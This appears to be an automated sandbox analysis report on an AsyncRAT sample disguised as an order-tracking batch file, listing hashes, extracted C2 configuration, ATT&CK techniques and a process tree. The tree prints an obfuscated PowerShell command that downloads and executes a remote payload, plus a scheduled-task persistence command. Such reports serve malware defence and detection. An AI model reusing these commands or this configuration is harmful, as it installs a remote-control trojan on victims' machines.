asyncrat | 4d634f419ee6d84324dccb8c2bbe3ed583220a676c92b1facf34bc749b4a9712

General

Target

TRACK-ORDER#114-85737.bat
Size

65KB
MD5

44d81d1aecc0e4b0aa0f9ad726a02e99
SHA1

eebf5c17f72ee3a323619f45dd1db9d03a417c37
SHA256

4d634f419ee6d84324dccb8c2bbe3ed583220a676c92b1facf34bc749b4a9712
SHA512

6aff752752bdc92478e336c4e71e6d77ada065a76e255e84070834bcdcca52d296cc22d7f778d1dd1cc859b31716fb5a08325977cda550d2ab5da6d490121cb2
SSDEEP

192:nyj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj/:4

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Default

C2

saedmad.linkpc.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/4144-152-0x000000000040E12E-mapping.dmp	asyncrat
behavioral2/memory/4144-151-0x0000000000400000-0x0000000000414000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2428	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4128 set thread context of 4144	4128	powershell.exe	112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4524	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2428	powershell.exe
2428	powershell.exe
4128	powershell.exe
4128	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	4144	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 644 wrote to memory of 3992	644	cmd.exe	86
PID 644 wrote to memory of 3992	644	cmd.exe	86
PID 3992 wrote to memory of 2428	3992	cmd.exe	87
PID 3992 wrote to memory of 2428	3992	cmd.exe	87
PID 2428 wrote to memory of 5056	2428	powershell.exe	94
PID 2428 wrote to memory of 5056	2428	powershell.exe	94
PID 5056 wrote to memory of 2340	5056	WScript.exe	96
PID 5056 wrote to memory of 2340	5056	WScript.exe	96
PID 2340 wrote to memory of 4524	2340	cmd.exe	98
PID 2340 wrote to memory of 4524	2340	cmd.exe	98
PID 1796 wrote to memory of 3876	1796	WScript.exe	109
PID 1796 wrote to memory of 3876	1796	WScript.exe	109
PID 3876 wrote to memory of 4128	3876	cmd.exe	111
PID 3876 wrote to memory of 4128	3876	cmd.exe	111
PID 4128 wrote to memory of 4144	4128	powershell.exe	112
PID 4128 wrote to memory of 4144	4128	powershell.exe	112
PID 4128 wrote to memory of 4144	4128	powershell.exe	112
PID 4128 wrote to memory of 4144	4128	powershell.exe	112
PID 4128 wrote to memory of 4144	4128	powershell.exe	112
PID 4128 wrote to memory of 4144	4128	powershell.exe	112
PID 4128 wrote to memory of 4144	4128	powershell.exe	112
PID 4128 wrote to memory of 4144	4128	powershell.exe	112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TRACK-ORDER#114-85737.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:644
- C:\Windows\system32\cmd.exe
  CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)
    3⤵
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Not\xx.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:5056
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Not\xx.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2340
      - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /tn App /sc minute /mo 3 /tr "C:\ProgramData\Not\Bin.vbs"
        6⤵
        Creates scheduled task(s)
        
        PID:4524

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Not\Bin.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Not\Bin.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Not\Bin.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4128
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4144

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Not\Bin.bat

Filesize
83B

MD5
228c44b9cc0e8c86c51fddaf3294bcf8

SHA1
7e83a7e1e4f33a4a299554090de4563534629754

SHA256
fce64aa23e5bc07ad08d364af38b3a3adc4effc0eaf72c90acf868b7be3fdf6a

SHA512
bbb26d73fd47a926cf358ae5263fb246a93201b60d8650018e24b027e7e708b9afdb5a0aeaed7444736eb319721b2da4eca57e60e3e98643270e09e1d0b433d6

Download Submit
C:\ProgramData\Not\Bin.ps1

Filesize
345KB

MD5
bb3e63b6d61561accb4026bcbd5a7afb

SHA1
21be5417c5fde2934f789fc9ca3fd0f55225f4a2

SHA256
56a539c6a9a2f57c81e3f873360f451c4c452f7bb3fad9353e9ce822fedaf1de

SHA512
50472f0848dec09a4184648072b731482100311e6b0f730002606cfdf4094e8b9f2bdc98f0a2fee085e479c05aa2c7d3eb99040c7c8c35737ffbc4e23fd2207c

Download Submit
C:\ProgramData\Not\Bin.vbs

Filesize
118B

MD5
9c7994acb861283eab4675bb06ba4159

SHA1
f6e83e6d35dbcf9cd3a0d3677d7b676df79d1b30

SHA256
e86197ddea92b4f651707713ffe7db2bb252786a6ae6196481433cc43e7a999c

SHA512
a512e20e819941e0bf713e42cbbf0c5ddf541f0976f49f022e2c1227f7a414443703fc985e65f0ced33f4d9c6cbd58849b28d05eb4b676c6a087ea10a3a9ff26

Download Submit
C:\ProgramData\Not\xx.bat

Filesize
81B

MD5
bed7fd2f5fc7183c0a509fc8f9d48ec9

SHA1
460dd3af5d3010be510b5593ba8740912c92fc85

SHA256
2f80e6b366b6a89a4e28234ab02f4bbc2232c899e5f1f167900567972c9589c2

SHA512
4c377cb0892eae4a003005f0b4bc081dd5f5a519cb662ab8dab9e2446d22a357a3774824e4c7d3613031a9a10dc061f79371c15510deabd21b8a80ff14f41445

Download Submit
C:\ProgramData\Not\xx.vbs

Filesize
169B

MD5
192a7c188e6ede340bdb4d518a4ed036

SHA1
141a993b91c38b734579427b815df181a0ee3cb1

SHA256
5e8c30a0ac20a2cac5e482a59ccbf94d9ac470034a4ef6cba58740d5056b7466

SHA512
3b7d1d75f665604896751036966d296558e2e11151c0de83cc079dda069d8f560cd0f0bd623c08ab09a466fadbc0d91d8e577dc3c32613fc9e2c807a023e1f3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6b7ac01e198a7605eb839bc9d0f82892

SHA1
1745825f055a97a44a877ce22b772709bdfafe0a

SHA256
bd6de323224adb57779eea57fe6817dea350d402161165a7a203540b5d98ee34

SHA512
cfab4ce52e0634e216945d6d54bb1801c9cda03a4c6e01881f044218ccd1383daa962fc7f5d83a910fb6ee89dcb4cfd310db706394ea4b6dac8b1870f1755a14

Download Submit
memory/2428-135-0x00007FFE93F90000-0x00007FFE94A51000-memory.dmp

Filesize
10.8MB

Download
memory/2428-136-0x00007FFE93F90000-0x00007FFE94A51000-memory.dmp

Filesize
10.8MB

Download
memory/2428-134-0x0000024FCDB50000-0x0000024FCDB72000-memory.dmp

Filesize
136KB

Download
memory/2428-139-0x00007FFE93F90000-0x00007FFE94A51000-memory.dmp

Filesize
10.8MB

Download
memory/4128-153-0x00007FFE93C60000-0x00007FFE94721000-memory.dmp

Filesize
10.8MB

Download
memory/4128-150-0x00007FFE93C60000-0x00007FFE94721000-memory.dmp

Filesize
10.8MB

Download
memory/4144-151-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4144-154-0x0000000005960000-0x00000000059FC000-memory.dmp

Filesize
624KB

Download
memory/4144-155-0x0000000005FB0000-0x0000000006554000-memory.dmp

Filesize
5.6MB

Download
memory/4144-156-0x0000000005A70000-0x0000000005AD6000-memory.dmp

Filesize
408KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads